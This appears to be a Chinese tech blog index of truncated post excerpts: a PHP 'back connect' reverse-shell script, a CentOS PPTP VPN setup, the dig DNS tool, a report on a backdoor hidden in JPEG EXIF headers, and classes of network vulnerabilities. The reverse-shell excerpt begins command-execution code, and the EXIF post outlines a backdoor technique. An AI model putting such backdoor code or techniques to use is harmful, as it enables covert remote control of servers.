Back connect for PHP

<?php 
function which($pr) {
	$path = execute("which $pr");
	return ($path ? $path : $pr);
}
function execute($cfe) {
	$res = '';
	if ($cfe) {
		if(function_exists('exec')) {
			@exec($cfe,$res);
			$res = j

[……]阅读全文

CentOS6使用yum搭建VPN

第一步:检查
如果检查结果没有这些支持的话,是不能安装pptp的。执行指令:
#modprobe ppp-compress-18 && echo ok
这条执行执行后,显示“ok”则表明通过。不过接下来还需要做另一个检查,输入指令:
#cat /dev/net/tun
如果这条指令显示结果为下面的文本,则表明通过:
cat: /dev/net/tun: File descriptor in bad state
上述两条均通过,才能安装pptp。否则就只能考虑openvpn,或者请你[……]阅读全文

dig,深入挖掘网站域名下隐藏的秘密

Dig命令简介:
Dig是一个在类Unix命令行模式下查询DNS包括NS记录,A记录,MX记录等相关信息的工具。

Dig命令安装(CentOS):

yum install bind-utils

最简单的用法:

[root@x360 ~]# dig

; <<>> DiG 9.3.6-P1-RedHat-9.3.6-20.P1.el5_8.6 <<>>
;; global options:  printcmd
;; Got

[……]阅读全文

隐藏在JPG图片EXIF头部中的恶意软件

几天前,我们研究团队的 Peter Gramantik 在一个被攻破的网站上发现一个非常有趣的后门。这个后门并没有依靠正常模式去隐藏起内容(比如 base64/gzip 编码),但是它却把自己的数据隐藏在 JPEG 图片的 EXIT 头部中了。它也使用 exif_read_data 和 preg_replace 两个 PHP 函数来读取 EXIF 头部和执行。

技术细节
这个后门可分为两部分。第一部分是 exif_read_data 函数读取图片头部,preg_replace 函数来执行[……]阅读全文

网络怎样查漏法

网络查漏法,即利用计算机网络的安全脆弱性或漏洞实施的一种信息侦察方法。
计算机网络系统的较件和硬件往并都存在漏洞,漏洞有多种类型,按潜在的危险程度分为A、B、C三类。C类漏洞是允许任何用户中断、降低或妨碍系统操作的漏洞,一般存在于网络协议中。利用c类漏洞仅能使系统不能提供正常的网络服务或瘫痪.而不能非法获取系统的访问权、修改或破坏数据。B类漏洞是允许本地用户提高访问权限,获得系统控制的漏洞,一舱存在于各种平台的应用程序中。A类漏洞是允许远程用户未经授权访问、可能会破坏整个系统的漏洞。A类漏洞的[……]阅读全文